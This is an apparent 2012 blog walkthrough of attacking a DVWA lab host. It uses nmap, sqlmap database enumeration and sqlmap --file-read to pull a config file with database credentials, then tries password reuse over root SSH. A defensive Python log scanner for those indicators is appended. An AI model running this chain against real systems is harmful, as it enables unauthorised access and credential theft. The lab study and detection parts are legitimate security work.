Tuesday, April 24, 2012

Simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

Hello guys, now I want to share web hacking through another attack vector.
I have a victim at address 192.168.56.101. I want to see which services are running, so I use nmap:
root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
root@archaveliano:/home/localhost# 

There I find a form to enter a user ID, and I try entering a quote mark ' in it. I get a syntax error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

It's time to work. I open my sqlmap and type this: "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 --dbms MySQL --dbs". The options are: -u for the URL; --cookie for the cookie, because this web app needs a login; -p for the vulnerable parameter; --risk for the risk of the tests (max=3); --level for the level of the tests (max=5); --thread for the max number of concurrent HTTP(s) requests (max=10); --dbms to force the back-end DBMS to this value; and --dbs to enumerate the DBMS databases.

It doesn't take long to wait; I can retrieve the databases like this:
[22:22:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:22:06] [INFO] fetching database names
[22:22:06] [INFO] the SQL query used returns 4 entries
[22:22:06] [INFO] starting 4 threads
[22:22:06] [INFO] retrieved: information_schema
[22:22:06] [INFO] retrieved: mysql
[22:22:06] [INFO] retrieved: fbip
[22:22:06] [INFO] retrieved: dvwa
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

Now I have 4 databases. Now I will try to take over the mysql database, and I enter this in sqlmap: "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 -D mysql --tables --dbs"
But I hit a problem, which looks like this:
[22:15:20] [WARNING] no column(s) found
[22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

I try to find another way, and I remember that sqlmap cannot only take over the database, it can also read files on the site, so now I will try that. But before I try, I need to know where the file I want is, so I need dirbuster to find the file.
The file I need is at /config/config.inc.php, so in sqlmap I enter this:
"./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1" and I take over the web config:
It is saved under the site's output folder, in files:
Now I know the MySQL user and password of this web app. I try to log in to MySQL with them, but I run into a problem again:
root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server

I try SSH, because people often get used to reusing the same password.
root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

And this is the result:

it's very simple, right?!
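Seen from the web server's side, the whole chain above leaves a trail in the Apache access log: the quote probe in the id parameter, sqlmap's default User-Agent and UNION/information_schema queries, and the LOAD_FILE() call that --file-read relies on, with the file path hex-encoded. The following Python script is an added example (not part of the original post, not sqlmap's code) that flags those indicators in constructed combined-format log lines; the log lines, timestamps and sqlmap version string are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not captured from the post's lab): a normal
# request, the manual quote probe, sqlmap enumerating schemas, and sqlmap's LOAD_FILE()
# read of the config file with the path hex-encoded, as --file-read typically does on MySQL.
SAMPLE_LOG = """\
192.168.56.1 - - [24/Apr/2012:22:20:01 +0700] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.56.1 - - [24/Apr/2012:22:20:05 +0700] "GET /vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4601 "-" "Mozilla/5.0"
192.168.56.1 - - [24/Apr/2012:22:22:06 +0700] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL,schema_name%20FROM%20information_schema.schemata--%20&Submit=Submit HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.56.1 - - [24/Apr/2012:22:30:11 +0700] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL,LOAD_FILE(0x2f7661722f7777772f636f6e6669672f636f6e6669672e696e632e706870)--%20&Submit=Submit HTTP/1.1" 200 6010 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
HEX_LIT = re.compile(r'0x((?:[0-9a-fA-F]{2})+)')

def decode_hex_literals(sql):
    """Replace MySQL 0x... string literals (sqlmap's usual encoding) with readable text."""
    return HEX_LIT.sub(lambda m: repr(bytes.fromhex(m.group(1)).decode("latin-1")), sql)

def indicators(line):
    """Return the injection / file-read indicators found in one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    found = []
    if "sqlmap" in m.group("ua").lower():
        found.append("sqlmap user-agent")
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)  # decodes %27 to '
    for name, values in params.items():
        for v in values:
            up = v.upper()
            if "'" in v or '"' in v:
                found.append(f"quote in {name}")
            if "UNION" in up and "SELECT" in up:
                found.append(f"union-select in {name}")
            if "INFORMATION_SCHEMA" in up:
                found.append(f"schema enumeration in {name}")
            if "LOAD_FILE(" in up:
                found.append(f"file read in {name}: {decode_hex_literals(v)}")
    return found

def scan_log(text):
    """Map the timestamp of every suspicious line to its indicators; clean lines are dropped."""
    hits = {}
    for line in text.splitlines():
        ind = indicators(line)
        if ind:
            hits[LOG_RE.match(line).group("ts")] = ind
    return hits
```

Run scan_log(SAMPLE_LOG) to see the three suspicious requests; the decoded LOAD_FILE argument shows exactly which file was pulled, which is the evidence that the database credentials in it need rotating.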